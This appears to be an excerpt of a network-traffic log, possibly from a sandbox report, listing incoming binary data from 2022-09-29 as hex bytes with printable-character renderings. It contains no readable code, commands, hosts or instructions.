                                                                                                                                                2022-09-29 12:51:43 UTC16120INData Raw: f4 b7 8e fb 1e 82 21 89 68 a6 64 8b d7 ab b9 05 09 17 5f 91 c1 95 2b af 0f df 73 70 28 23 85 74 ce 90 99 f6 2d d7 c9 51 65 65 a7 80 de eb d9 a2 54 d8 80 8c 22 32 2b 3f eb 90 d4 6e a1 89 03 ec 50 33 30 28 d9 3e c5 5c 3c 6a c3 21 94 83 fa d4 ca f3 77 42 ed c0 75 bd 71 4d b9 4f 05 16 c1 bc 2f 1a 0e a2 61 86 63 8a 9e 91 24 b5 b7 22 08 89 16 81 ca 73 52 55 1c d2 bd ec 31 8a d7 7b 04 58 b2 27 cc f6 2d d5 8f 57 84 4a 9f 9f fb a5 6a 40 11 04 99 c7 87 06 d6 8f 92 26 0e d7 44 63 c0 56 6c 89 24 5b 99 7a 24 0b 34 c8 55 b0 dc 10 dc de 67 6b b1 be 38 8a 4e 5a e1 a7 59 10 fb b0 19 f0 ff d5 c1 45 2a 3c f0 c0 70 0b 50 f8 3f f3 c4 f0 56 ec 17 e8 9e f1 3f 1b 69 a3 98 38 db 7e 00 b9 da e8 0e ca ac 26 f7 8f 5e a9 b6 cf 5a ff 0b 36 bf 7a 75 51 f9 47 e0 d2 2b 73 fe 71 ba 27 7c
                                                                                                                                                Data Ascii: !hd_+sp(#t-QeeT"2+?nP30(>\<j!wBuqMO/ac$"sRU1{X'-WJj@&DcVl$[z$4Ugk8NZYE*<pP?V?i8~&^Z6zuQG+sq'|
                                                                                                                                                2022-09-29 12:51:43 UTC16136INData Raw: ff 86 6e da de 80 e1 fa 61 41 ac ef 02 8f 07 41 78 f4 b7 4c 28 86 6e b5 b7 97 78 4e 26 40 80 03 8e 84 5b 83 cc 04 d8 72 92 87 9e 98 15 6a 85 56 01 a3 76 2c 4a ee 2d 78 5e 48 dd bd b7 09 2f 48 b8 f8 bf 54 f1 f0 41 5d 2a 75 30 a5 93 86 1b ea cd aa 11 36 14 70 47 99 1d 44 36 b4 48 b2 b5 26 f6 88 93 63 59 d2 24 8b 26 62 c8 61 91 88 ce 0f 85 1d 6a d5 a0 52 4c a4 45 55 b6 97 79 05 e5 c9 5f e1 80 2c 7e a2 02 ed 0b fa 50 f5 08 5f b7 b8 ae f3 6e 96 bc a0 ae c7 29 c5 c4 84 2a 55 59 61 60 ac 41 5f c9 6f 40 5e b6 94 ff 6e 96 c0 e5 c7 d8 39 90 39 21 4d 1a 09 0f cd 42 a4 c7 62 70 5a 33 4f ce bc 91 92 e6 72 04 37 ef 94 51 23 25 54 03 7b a2 a8 d0 50 7f ab 8a 0e eb 7d 01 55 d4 3a 1c 3f ad 32 7a 8c fc c0 fc 74 ca ec a0 28 0b 16 30 27 bf cc ad 38 e0 2e 4f df 36 91 c4 a0 a6
                                                                                                                                                Data Ascii: naAAxL(nxN&@[rjVv,J-x^H/HTA]*u06pGD6H&cY$&bajRLEUy_,~P_n)*UYa`A_o@^n99!MBbpZ3Or7Q#%T{P}U:?2zt(0'8.O6
                                                                                                                                                2022-09-29 12:51:43 UTC16152INData Raw: 51 a2 b6 a9 a3 7d ba de 24 94 db 85 10 56 d1 3f 84 83 da f1 78 a7 f7 a4 96 e5 37 04 86 0f b0 0d 11 db 55 e3 ed 1d 42 2f 84 36 b3 75 79 bd a0 50 78 08 95 6e ec 80 4f 27 75 4e df 22 19 87 15 34 5a 99 31 1d 0c c9 44 26 1f 52 c0 fe c8 3a 39 2b b1 b6 af 63 1c a2 30 20 c0 f3 09 9f 78 1b f5 e2 44 38 0f c4 4a a1 2a a2 cc 68 3f 83 76 98 55 e2 d9 83 2d f3 9e 7e c7 69 c8 17 30 72 54 49 09 12 9d e2 37 7c 2c 23 6a 0f 72 eb 98 e1 94 ed 42 62 5a 21 e9 ed a2 c0 0c bd 9f 02 8f 2f 4b 98 a0 37 db 16 11 17 b7 a8 61 1c 91 f4 19 d9 0a 7d b2 da 28 00 87 ce 41 30 f9 39 21 bb 7e 9d 23 46 56 b1 d1 0d 5a b6 91 e2 01 a3 8c 8d 3c 5b 78 8c 36 89 32 6e cb 5e 63 89 6b 3c 98 de e4 84 2c 6f fe 43 8d 78 e1 8b a0 5a 24 f0 79 6d ba 50 5f f0 e1 c5 6f 77 f1 57 c4 13 72 e8 45 58 c1 54 d7 36 b2
                                                                                                                                                Data Ascii: Q}$V?x7UB/6uyPxnO'uN"4Z1D&R:9+c0 xD8J*h?vU-~i0rTI7|,#jrBbZ!/K7a}(A09!~#FVZ<[x62n^ck<,oCxZ$ymP_owWrEXT6
                                                                                                                                                2022-09-29 12:51:43 UTC16168INData Raw: 3a bf ab 67 1c a7 d5 57 90 85 4f fd 3e 6e ec 58 89 e9 52 5b b8 d5 ea 7d 95 cb cc 46 c9 9b 0c 6a 0a 6d 21 7b c6 4f 67 6c 97 b7 99 56 32 38 ae ce 8f a8 0a 64 ea 93 e1 53 1b 0c 36 df f0 77 93 ad 67 52 06 f0 f9 1e 30 e6 35 ce d7 55 c0 f3 8b 8c 7e 47 72 a7 95 ab 44 76 f8 75 d8 f8 74 aa 6b ad 78 74 b4 c1 40 3f 60 8e db 70 bc 4e 54 ff b9 d9 be b0 40 ff 3e 48 38 69 e6 05 d5 ef 64 97 a3 06 63 f1 e0 0d ff af 6c cf 05 a7 86 e4 da 60 86 93 46 6f cc b0 b2 07 2d a3 51 96 6c 87 0b dd 76 55 67 92 34 68 34 1e 64 eb 63 aa 2b 55 ce ba e2 69 c1 75 e1 bc 9c 5c 4f a9 64 3d 23 9c f9 9d d8 32 09 1d e3 45 28 c2 8a f5 43 f4 44 7e 49 89 74 20 1e 19 32 71 a4 f2 f5 74 68 e3 81 69 4b ee 7d 38 d6 be 11 92 70 6a 56 8f 0b f7 65 18 e0 66 05 4e 71 25 c8 42 dd 4a 18 fe 7c 12 9b a9 00 0b 18
                                                                                                                                                Data Ascii: :gWO>nXR[}Fjm!{OglV28dS6wgR05U~GrDvutkxt@?`pNT@>H8idcl`Fo-QlvUg4h4dc+Uiu\Od=#2E(CD~It 2qthiK}8pjVefNq%BJ|
                                                                                                                                                2022-09-29 12:51:43 UTC16184INData Raw: 15 43 84 fb e9 66 4b 24 ca 88 fa 0d fe 39 3a 9e 20 01 c1 ca b5 a1 02 d5 4a 0e 91 e9 30 a2 25 ab 84 86 3a cc be 11 56 b1 e1 12 e4 2d 1a 9d 6f 86 e1 d3 83 64 0a 38 92 40 9f a8 f9 be aa 37 3d 06 ab 12 25 be 69 df f3 9c e5 cd b4 1a 34 86 72 33 4a 3a ce 5f c5 d8 91 ea 29 d1 6f 52 e1 00 59 1d 58 94 65 b2 25 47 c0 2f 5f 5f 2c 8f fb d2 44 1e 07 ee e5 f6 77 6d f2 06 03 5e 44 bb 91 c1 58 1a bf 26 82 0d 47 c0 96 0f d9 40 5f 4c e7 9d 8f 64 fb 05 fc df 8e 20 45 20 6a 30 99 3d 25 87 70 2b c8 0e ae a0 c8 26 a5 3b 50 e9 20 a2 38 cc 91 23 df 29 c9 1d ad d0 30 fc 81 4e 5b d6 10 77 d6 20 05 d1 75 80 44 22 8a 47 82 90 2e a4 d8 05 8d 00 3b 06 11 ae db f3 81 f9 f0 c2 dc d5 a1 61 59 37 e3 6e 1b 63 f7 d6 40 ff 6e a9 95 9e f3 21 06 59 30 65 50 f6 63 0e e1 dc dc 3b 0d c8 dc 7b 85
                                                                                                                                                Data Ascii: CfK$9: J0%:V-od8@7=%i4r3J:_)oRYXe%G/__,Dwm^DX&G@_Ld E j0=%p+&;P 8#)0N[w uD"G.;aY7nc@n!Y0ePc;{
                                                                                                                                                2022-09-29 12:51:43 UTC16200INData Raw: d4 62 d1 10 ca 67 ab 07 69 c0 45 6d b6 c2 0d d4 b7 11 8d a0 90 8f 7f cd 0f a4 73 84 e9 ab b5 b8 05 12 00 1d 32 c7 5e 70 a5 61 ab 3d 7b 6c 26 f0 8d 07 37 55 ac 09 f1 35 50 ea 3b fa 67 28 83 eb 5c c3 2b 83 60 4f b0 89 4b cd 19 71 fc 52 ac f8 c6 2e 3c 0e cc 00 dc 18 1b 43 87 8d 83 2f 95 03 bd 60 df 55 5d 0e 53 82 04 75 8e fc c9 7b 54 05 7f 7b 21 b7 3d d0 53 27 39 70 0f ed 75 32 71 8b 7f 35 dc 75 28 7a 73 b7 12 02 40 a6 be 37 87 20 c0 d8 65 7d d3 02 56 20 17 86 a7 14 db ab 66 c5 5d 4e 9c d6 0a b2 97 4c 16 4d 73 8a 5d 11 24 d5 6b 2b 09 af 71 53 6f 3a 6c dd 87 1b 12 c3 95 75 a8 2d 2f 2d 4f 3d e6 93 df bf bf 11 d8 91 89 8b fd fe 7d 49 7a 25 2f 96 04 bd bb f8 ee 14 3c 0f ea f8 53 fb 7a 5a 9f 3f 89 76 6b 57 34 c5 ba 82 19 37 97 a7 aa a2 e4 43 62 55 22 2f 83 a1 37
                                                                                                                                                Data Ascii: bgiEms2^pa={l&7U5P;g(\+`OKqR.<C/`U]Su{T{!=S'9pu2q5u(zs@7 e}V f]NLMs]$k+qSo:lu-/-O=}Iz%/<SzZ?vkW47CbU"/7
                                                                                                                                                2022-09-29 12:51:43 UTC16216INData Raw: 99 d6 5a 2c a9 9c d0 1a 8b 91 d8 a1 20 c5 81 74 ca a0 44 cd 6f ae 1c c7 68 d4 d2 4d b4 a9 a7 b8 45 38 c1 da 21 87 2d c5 f4 59 bc 70 e1 28 fb a3 f3 49 e9 59 9d 2d 25 1d 46 b7 93 fa 96 04 99 3f 8f e6 f0 cc 2d d9 37 38 5f 31 90 6b f8 0f 05 d5 bf b7 b6 23 99 92 bc 1d 7d 21 e0 2a 6f 9a 9f 48 83 35 c8 35 a3 d6 95 dc 06 60 cb 62 af 29 10 60 7c d3 c0 97 2e 87 db fc 44 0c 14 60 3a 49 eb 1b 96 82 b4 f0 d1 21 cf 48 b4 d6 0e de f4 e8 c9 0f 38 71 cd 9c 71 b6 2b d6 f8 aa cb 50 db 39 80 fb 04 e1 83 43 c5 91 9c 58 64 f5 5c 8b 60 3d 68 54 a1 94 cd 77 f2 9d c1 a9 b8 bb 11 a5 d1 2c 5b ce c8 85 cc 36 0e c1 2b ef 33 c4 b2 ba 9e 3f 0f 43 63 fc 7d 74 5a f0 37 43 53 37 f7 9b df 1a 5c 8e 53 b4 72 83 d9 7d 97 70 d2 53 a5 66 bb 8d 51 95 37 4a fc 9c ef 46 99 68 0a c7 25 ce a7 70 39
                                                                                                                                                Data Ascii: Z, tDohME8!-Yp(IY-%F?-78_1k#}!*oH55`b)`|.D`:I!H8qq+P9CXd\`=hTw,[6+3?Cc}tZ7CS7\Sr}pSfQ7JFh%p9
                                                                                                                                                2022-09-29 12:51:43 UTC16232INData Raw: b4 c1 2e 3a 2a aa 92 7a 64 c3 84 bf f2 0c af d7 40 24 2e fb d3 08 76 ed 7d 1b 1b 26 4e 7d 82 0f 22 69 a4 1e 2d 26 31 25 b9 89 b6 7a 73 b6 b7 7a fb 52 f5 73 09 31 fe d9 4e f5 8a 5f 40 45 8e 14 73 63 e0 04 bf 05 7f 88 d7 79 85 e9 56 de 57 7c 64 e0 51 da dc 57 c5 bf af be 16 4d ba 97 03 b9 f4 b4 58 5c 27 fe 98 75 c3 0a 75 b8 d0 47 7d 18 49 99 9a ea c5 07 b9 2b 52 f4 3c 8c 6e fb 35 43 41 04 b8 c0 e3 fe a2 fc 47 9e a1 06 98 58 3d f0 e8 84 68 98 b7 9d dc c9 2b 1b 76 7b 5c a5 2f 63 f1 44 6d 4b 2e 55 c2 9a e4 37 7b ac 65 36 78 6c d6 92 48 9c c7 86 0f 9a 69 e7 c2 98 05 e1 48 68 8d 38 70 da 39 f2 92 67 43 44 d4 2f a3 74 d4 00 b6 56 7b d1 0b 8e 3d bd be 93 da 23 bb 35 cc 20 8d 0e 06 61 3b f7 95 5e 7a 81 ed 84 1f 16 a2 b0 ed b1 f4 55 9e ea b9 91 23 4e f2 86 54 5c 93
                                                                                                                                                Data Ascii: .:*zd@$.v}&N}"i-&1%zszRs1N_@EscyVW|dQWMX\'uuG}I+R<n5CAGX=h+v{\/cDmK.U7{e6xlHiHh8p9gCD/tV{=#5 a;^zU#NT\
                                                                                                                                                2022-09-29 12:51:43 UTC16248INData Raw: 06 f7 74 e8 24 3d fa 88 dc f5 4b 5a aa d8 a9 ba 95 02 71 19 65 a2 58 e2 56 34 4b ce f0 be 54 7a 04 40 92 73 03 87 92 b0 af da 84 50 7e 26 2a 5f 24 02 b1 0d df 63 16 73 f5 1e e7 a8 21 e6 d7 ca e9 73 52 e2 1b 6e 77 b7 b0 c8 15 10 73 10 1d 86 b5 c1 9a 08 83 76 ba 24 8a f6 8f 7a df 31 24 a7 59 0d d9 b9 75 0f 6a ad ac 9f 19 54 46 5b b4 06 c9 85 1f a4 46 22 34 10 2f 06 13 d5 ba b1 ce 5c 42 56 d8 a1 ab 78 81 00 25 0f c1 b6 23 dd 03 0f 22 b6 47 da f1 0a 15 18 c4 d4 81 31 59 58 2d 2b 5e 6a e0 5f 17 1f bf fe 89 61 24 fb 1c e6 3c de c1 5a 28 e6 ec da 7d e2 38 20 a2 20 e4 77 0c d2 d6 df 89 b7 83 6d a7 88 84 37 01 47 fc 52 e7 e7 da 76 d5 ca 04 bc f6 a7 54 b9 81 85 f2 33 93 ea 43 a1 c8 18 d4 bb c5 a8 74 4e 1b 8d 03 55 8a 8e a9 d7 09 25 4e 74 77 d4 f4 0a f2 f2 fd 6c 4e
                                                                                                                                                Data Ascii: t$=KZqeXV4KTz@sP~&*_$cs!sRnwsv$z1$YujTF[F"4/\BVx%#"G1YX-+^j_a$<Z(}8 wm7GRvT3CtNU%NtwlN
                                                                                                                                                2022-09-29 12:51:43 UTC16264INData Raw: 36 a2 0b 88 91 b6 28 f0 1b 00 31 80 69 c2 b3 a8 e7 7c cb ab 6d d8 ef eb 00 da e0 52 23 fe 86 c6 7f cc 5c c1 fa de a7 3c ed 89 e8 b5 fd 78 81 89 7f 9e 18 9e f6 bf 33 44 93 43 b3 b0 8d 04 e5 95 9c 93 51 12 d2 cb ce 8b 9e 05 96 20 5f 5b 85 cd 7a bc 54 cc fe 90 e7 80 78 86 12 a8 96 a8 eb af 83 3e 29 dc e7 ad 78 ac b7 67 5c 91 2c ba f5 53 36 f2 f7 bb ee 13 79 c4 81 76 98 25 17 c8 6e f5 a1 76 0f e2 01 4c 31 e9 fe d3 26 08 37 5b 0c 98 82 39 56 b6 b0 c5 65 52 16 a2 68 4f 8c d1 2f 9a a6 a4 19 5e 5b 27 a9 5c 7f 1f e8 a7 15 a6 fd bc 19 22 8b a0 c2 68 81 4f 4f a0 0a 63 fb 00 b7 01 76 80 18 f1 17 84 6f 38 23 99 80 93 00 9e ef 69 00 53 c3 91 15 dd 90 3b 7e e4 3c 54 4f cc 85 ac 7b 42 71 17 68 7f 0f 77 1a 3c a2 ba c1 b5 b6 c6 73 5a 5a 1d c0 e7 c4 02 14 10 91 9e c7 69 cc
                                                                                                                                                Data Ascii: 6(1i|mR#\<x3DCQ _[zTx>)xg\,S6yv%nvL1&7[9VeRhO/^['\"hOOcvo8#iS;~<TO{Bqhw<sZZi
                                                                                                                                                2022-09-29 12:51:43 UTC16280INData Raw: 22 6c 73 2f 2c 04 bc fb 41 e0 48 3b 28 79 8c 06 c7 40 82 93 c5 f4 ff b0 71 14 a3 c2 5c a0 29 4e 0f 27 ca b5 04 65 9f d1 12 10 f6 e7 72 03 e5 ed fb 12 3c ce f1 9c 73 45 c1 c6 39 d6 45 7c 77 7f 2e 53 64 f6 29 91 69 7c d6 39 c5 23 7c 2b 96 97 d7 40 f9 45 49 22 b9 bb 61 d8 80 2d c8 71 73 98 19 36 48 f6 12 3b 3c 20 d4 e8 4e ba e4 e0 7a fa 28 d4 f3 e0 9a 9f 2d e7 9a d1 14 2c 03 8d 4a 4c d3 09 13 d4 15 52 83 b5 68 96 9e 56 3e 4f b5 ba 07 5f 9e 5b 9d 22 cf 49 0c 06 d7 af 6f 29 ef 2d d2 c2 c5 3d ab 5d 9c 3c de b0 6a 37 9b bc 4a a7 fe 5d 92 bd 88 ff 7e 80 0e 2d 98 43 a4 8c f1 f7 47 13 78 c4 ed d6 09 3f 9d 17 5b 0c 4f af 92 8a 15 13 4f 26 e8 ba c7 80 1b bf 22 55 60 36 69 15 33 63 44 22 e9 89 06 15 77 8e f9 ce 46 71 10 00 4b 96 b5 05 eb 1d d8 fe 2b 5f 47 81 3c e8 59
                                                                                                                                                Data Ascii: "ls/,AH;(y@q\)N'er<sE9E|w.Sd)i|9#|+@EI"a-qs6H;< Nz(-,JLRhV>O_["Io)-=]<j7J]~-CGx?[OO&"U`6i3cD"wFqK+_G<Y
                                                                                                                                                2022-09-29 12:51:43 UTC16296INData Raw: 3c 58 6e 52 ec 98 ac a4 b6 dd 81 f2 26 e7 ce c4 b3 c3 85 f0 b5 8f cf 87 f6 ec 8b 31 71 95 3c 4b 27 01 03 00 9b 71 82 15 a1 fb b5 71 ab e2 75 df fb 5a f9 55 38 49 f1 c6 30 91 03 f2 9c 5f 8f 3f 56 da dd 7e aa 9b 72 1c c8 93 a8 ee 46 3b db 6b 59 26 45 3b b0 84 6f 42 c9 8b 1f 15 96 f0 22 3c 35 3a cf f6 cc 22 84 7e c1 cc 19 f6 d0 9d fc 4e d9 a8 e1 57 2b 3d fb 68 43 6b 27 92 4d 9f 6a 0a 1f 84 04 2f 86 e3 91 60 0c 3f c7 d7 c7 03 b0 a7 91 e6 33 15 b5 0d d0 e3 ee 57 4f 52 e4 4e bf fd 92 ac a6 aa f2 7b 00 95 0d 70 92 8e a7 e8 1a 2b b9 d6 e1 3d ac 2a 13 bd 62 85 01 b4 c0 9a 66 f4 f5 7f d9 29 bf 6c d9 ba ce 15 bb b0 04 b2 d6 af d7 69 7d 15 ec ba 09 e2 e1 0a 09 f4 a1 54 38 04 57 9e e1 86 56 a2 17 ce 91 2d 87 f1 29 13 95 6d ed e3 61 e4 86 40 bb e5 17 f8 8b 11 64 9d 6f
                                                                                                                                                Data Ascii: <XnR&1q<K'qquZU8I0_?V~rF;kY&E;oB"<5:"~NW+=hCk'Mj/`?3WORN{p+=*bf)li}T8WV-)ma@do
                                                                                                                                                2022-09-29 12:51:43 UTC16312INData Raw: 08 88 d9 58 da 66 b8 08 7c 78 7a 5b 10 60 2f 91 2b 54 2b 6c 3c 84 05 ab bb 2d 08 e8 2f 39 dc ef 16 01 fd 11 31 ab 38 b1 b6 b1 b0 38 02 91 b0 be bc 95 f8 8f 83 76 e3 61 4b 4a be 4c 65 7a 8c a6 31 ee b0 0e 00 87 d8 89 c6 ca 5a 27 a5 35 da 44 12 b1 90 0c f7 67 4c 93 59 9b 8c 82 9e 25 ec 8c 0a 39 8a 7c c2 f1 cd 8e eb bb 19 5b b8 ca b9 b9 5b a2 8f a8 94 3a ad c9 87 01 76 ed 57 ca 14 36 f9 d8 e9 1e 16 a0 f4 7b 2f 26 06 bc d3 6c bc ba 89 d4 92 79 08 48 df 46 39 f7 80 b6 42 80 1e a6 d1 09 04 e1 6e b7 38 9a e0 bc ab 6c 3a 88 6a 87 34 af 57 bc ba e3 8c 7d 91 2d 9f 62 d8 83 6f 21 3b 29 62 6f 5d 02 cc f1 97 1c ce 6d b9 77 3a d9 48 10 6c 31 ad 9f cb 23 cf 97 0d f3 00 39 11 ff b8 af ab 32 14 c6 e9 17 71 8f e2 5a 4c 57 79 18 60 d5 23 e0 c2 b5 52 24 f9 68 e2 d3 72 58 25
                                                                                                                                                Data Ascii: Xf|xz[`/+T+l<-/9188vaKJLez1Z'5DgLY%9|[[:vW6{/&lyHF9Bn8l:j4W}-bo!;)bo]mw:Hl1#92qZLWy`#R$hrX%
                                                                                                                                                2022-09-29 12:51:43 UTC16328INData Raw: 5a 90 7a 76 54 b8 c6 75 ad 58 89 d9 93 49 a4 69 42 2a 83 39 c5 be f3 19 39 b3 8d d3 43 f1 59 1b 79 aa 53 7d e7 de e1 ef d3 62 13 73 63 0e 4a 59 3c 01 ba 18 d0 44 94 cb db 80 cc 11 63 03 57 12 c9 a1 24 27 28 a8 7d f5 12 76 4f c1 3f 2e 11 12 ac fe c2 19 47 3d d4 86 0d 4b 8b 75 80 10 57 79 07 99 8c 40 18 3b 95 d1 ac 3e 5c b8 af 90 21 e0 72 12 0a c1 29 8d ea bb 21 91 29 f0 39 72 93 5f 27 b0 4a 57 f9 9d 02 20 e8 95 72 aa 02 f7 6f cc 42 49 6a 6a b9 61 2a 32 7f 94 9a 75 d7 14 53 1d 8f a8 e5 18 7e b9 7b 90 35 76 d0 98 ef 70 4e 5e 67 f0 f4 bf 80 fa bd 96 ce 77 e1 80 b3 98 20 f2 14 4d ec a7 91 96 57 c1 b7 2c d9 4a 7f ea 53 c1 02 1b 91 36 87 9e 86 b8 ca 7b 88 49 40 81 b2 98 84 f5 1a 98 f6 f6 75 0b 0d 45 7c 12 71 8a 35 e0 62 f9 f9 dc 87 6f 23 d6 4c d9 b3 94 a7 e6 90
                                                                                                                                                Data Ascii: ZzvTuXIiB*99CYyS}bscJY<DcW$'(}vO?.G=KuWy@;>\!r)!)9r_'JW roBIjja*2uS~{5vpN^gw MW,JS6{I@uE|q5bo#L
                                                                                                                                                2022-09-29 12:51:43 UTC16344INData Raw: 0d 5d 28 4c d8 b5 64 de ff 6a eb 44 38 3f c8 56 c8 8c 37 69 1a 75 9e 74 a2 3a b1 27 31 de 8f 90 01 93 3b 31 92 45 14 aa 8e c5 2f 3d 3b b4 04 fe d4 23 46 46 27 e6 a5 4a fd 4f 87 1e ed 80 61 36 1d 20 68 68 63 b5 bd 4f 30 de aa f9 14 3c bb 2c 99 f9 22 cd 3b a2 75 b7 4a 21 0a e0 40 ce 8f 99 2a ec 79 d5 cc a3 a3 cf 70 27 74 eb e6 bb c4 3d 48 4d 80 82 a1 16 33 ca aa d6 44 f2 6f 36 7a 79 8b a5 0a c8 d2 21 82 09 0c c8 34 78 86 87 32 d9 0d c2 cd 93 27 b6 9c 97 e2 d7 d6 84 eb 74 2e 26 fc 7d a0 45 7a f1 6a 34 1f 61 d3 b7 2a a8 3d ae 85 6f 8e 41 3e 8f 8c d1 aa bc 60 6f bd f1 2e 7d d8 82 0a 1b 9b 7b c7 65 1e 74 9c 0d 68 c4 9d c3 71 de 5c 89 05 d0 f5 b9 ab d7 3d c8 1f 8c cf 19 94 3f 91 e7 59 78 1c 80 80 5c 7c 51 da 93 1f 85 00 5f 19 4d da 43 de f8 bb 62 75 0a 9a 42 b6
                                                                                                                                                Data Ascii: ](LdjD8?V7iut:'1;1E/=;#FF'JOa6 hhcO0<,";uJ!@*yp't=HM3Do6zy!4x2't.&}Ezj4a*=oA>`o.}{ethq\=?Yx\|Q_MCbuB
                                                                                                                                                2022-09-29 12:51:43 UTC16360INData Raw: 97 a6 8e 94 59 fd 9c 3a 39 7d fb 09 51 41 02 3a af 61 99 66 40 7b c1 10 41 cd 8d d1 29 ca f5 42 43 1f f2 ba 4e 60 aa 1b 2a 44 01 16 aa f3 69 52 cf a1 8b f4 55 1b d7 00 9a 50 f7 7c 49 6c dd fc 2b c4 38 72 83 a2 c4 02 48 bb f5 7d 1d c2 34 42 db 9a 68 30 bc 2d e9 64 8a c4 54 5a f3 a4 21 1c b1 dd 64 e9 2b 2b 5c fd 0b 0b 68 a3 91 07 f2 ca b4 52 94 5f 9b d9 c1 c9 20 c2 2f f4 9d 85 16 a2 5b 3a 49 66 03 03 c4 02 e1 e7 97 db 68 74 86 86 d3 43 a4 e1 00 7e 1f ba 30 2d 33 35 30 88 d1 e2 42 18 14 d6 14 bd bf a5 08 41 e8 aa f4 41 58 f5 47 d8 9c 0f 3b d9 01 2f c7 24 bd 65 14 84 fd dd ab cb 62 77 54 13 9f f9 5a 07 4f 1b 23 bb bd 6e 90 38 25 10 33 fc f4 27 f6 9d d4 b2 37 5f 66 40 43 e4 2a 85 52 68 2c 5b de 72 0c c5 a0 a8 bd 72 7e 94 7d 8c 2b 51 23 6d 16 c0 fb d4 9e 96 09
                                                                                                                                                Data Ascii: Y:9}QA:af@{A)BCN`*DiRUP|Il+8rH}4Bh0-dTZ!d++\hR_ /[:IfhtC~0-350BAAXG;/$ebwTZO#n8%3'7_f@C*Rh,[rr~}+Q#m
                                                                                                                                                2022-09-29 12:51:43 UTC16376INData Raw: 30 63 42 6d ed 41 d7 7f b0 12 3e fc 5a 87 df 32 2f 77 b9 d8 db cb b6 60 29 7b 3f e6 14 76 5a 02 de be c1 d8 5e 18 41 28 19 cd 14 7f 3f d6 05 31 1d a7 0f 98 e3 3b c8 d1 49 c9 84 90 28 c0 ad 81 f5 24 03 ef d3 31 e4 3e 43 a8 b1 48 61 19 43 f1 73 d3 da 6d 52 e9 44 c5 68 d0 d8 a0 ee ae 69 fb e5 70 87 c1 13 eb 41 08 1d 43 a5 b3 37 79 dc 9c 85 63 1e 04 20 ae b1 ba 71 2f e2 9d 3e 85 ae a8 8d e4 33 e1 11 b5 d0 b7 3d 5d 44 60 0b 0c 92 b4 4e 6d 48 ce 7e e5 4a 0a 87 a6 e7 43 52 6d 41 78 af 16 7c 12 8b 71 dc 4f 6b 2c 83 c2 53 dd 59 cc 2e ae 27 2c c7 76 b0 f9 4d 2e ea d4 4b a4 8f 45 fa 61 ef 12 78 8c ea 20 42 32 7f 25 2f f1 40 f3 b4 6c d5 6f ad 3b b0 ce 39 7c 35 d4 7b 34 a8 40 4b 2a 0e 45 c5 50 fd 3b 1a b1 50 fb f5 d9 11 1f b8 61 6f 7b 0f 43 1a 4b 3f 06 84 70 ff e6 ba
                                                                                                                                                Data Ascii: 0cBmA>Z2/w`){?vZ^A(?1;I($1>CHaCsmRDhipAC7yc q/>3=]D`NmH~JCRmAx|qOk,SY.',vM.KEax B2%/@lo;9|5{4@K*EP;Pao{CK?p
                                                                                                                                                2022-09-29 12:51:43 UTC16392INData Raw: 66 f6 e5 b3 2c 08 40 bd 5c 42 ea 86 ce e1 38 fc a7 47 c8 f4 ce 32 55 a7 8c 04 88 7f 76 81 87 e7 4c d6 db fb df e5 d9 f0 bb ef cc ed 1b d1 08 74 bb 73 89 26 bc e9 43 a1 c3 5a c0 1b 6a ae 99 3f 5c 08 e0 a5 a8 4b b5 19 07 0b 28 41 69 61 ff f0 44 ea 75 05 17 7c d7 df 84 37 2b de eb eb b8 32 e2 3a 6f 18 03 73 41 24 84 f9 01 da 34 83 5e 0a 73 d6 d4 3a 87 33 a0 be cc 7b b4 df c9 f7 42 c6 c6 37 01 a6 84 06 93 43 94 47 1f b2 8a bf 8c 3a 8f dd 81 80 86 30 75 d1 95 6f 1a 66 4a db 8e d2 13 e8 92 f4 38 9d 27 d3 a1 b1 40 0c 01 55 56 ee 9d d3 41 6e 32 35 c6 58 fd f8 b2 14 4e 22 1a 6d 42 23 0b 4d ce 53 14 77 b6 e2 d5 39 65 36 fa d4 cd 1a d8 60 c2 d0 9f 22 53 66 e5 52 be 6f 4c ea fb a0 dd 75 fa 0e 5c ec 3c d8 44 1f dd 04 fe d2 79 d2 fb 9d ad 76 72 e9 8a 14 a3 19 f3 cb 7a
                                                                                                                                                Data Ascii: f,@\B8G2UvLts&CZj?\K(AiaDu|7+2:osA$4^s:3{B7CG:0uofJ8'@UVAn25XN"mB#MSw9e6`"SfRoLu\<Dyvrz
                                                                                                                                                2022-09-29 12:51:43 UTC16408INData Raw: fd 71 44 13 b7 26 fd f2 f5 e3 7d 96 28 4c 68 17 61 85 5a 6a 11 91 db f7 ff f8 66 6d a1 84 24 a2 75 c3 3d c0 2b f7 ff a7 f4 3e e3 e9 51 1b 85 e9 96 cd fc f3 20 f9 c4 e0 b4 17 16 63 90 5c cd 5d ca fe f4 9c 64 f2 87 25 0f 1c 03 2c 22 a8 4f da 39 75 b3 9d 7a c3 c4 e9 38 0c 56 bb 9e 4c 43 b3 0d 78 54 89 bb 70 d3 a2 d3 98 64 d9 fa d9 7f 22 2a 9f f2 4c 16 ac 4b a7 69 b9 30 bc f8 56 51 82 3e ce ce 61 8d 39 f8 4e 0d fc 98 08 6d 4b 8d bc 59 54 59 93 66 90 c7 fb 7c 6a bb af 27 31 ca 26 26 fc 1b 15 16 db 4e d0 9b d9 04 d2 ae 95 0d d4 bc 91 93 0f e7 62 9f 7e a4 59 18 73 12 b2 fb 81 2d 55 7a b4 96 29 44 e9 0f 3c 47 b5 1c 6c 8d 67 29 e6 e8 f8 48 bf 3b 7a c7 d1 10 e7 d8 f9 27 90 53 31 88 dc b4 e9 30 f3 72 c4 94 81 cf a7 17 a5 d0 27 fb 13 e7 ee dc ee 8e a6 cb ea 37 51 b1
                                                                                                                                                Data Ascii: qD&}(LhaZjfm$u=+>Q c\]d%,"O9uz8VLCxTpd"*LKi0VQ>a9NmKYTYf|j'1&&Nb~Ys-Uz)D<Glg)H;z'S10r'7Q
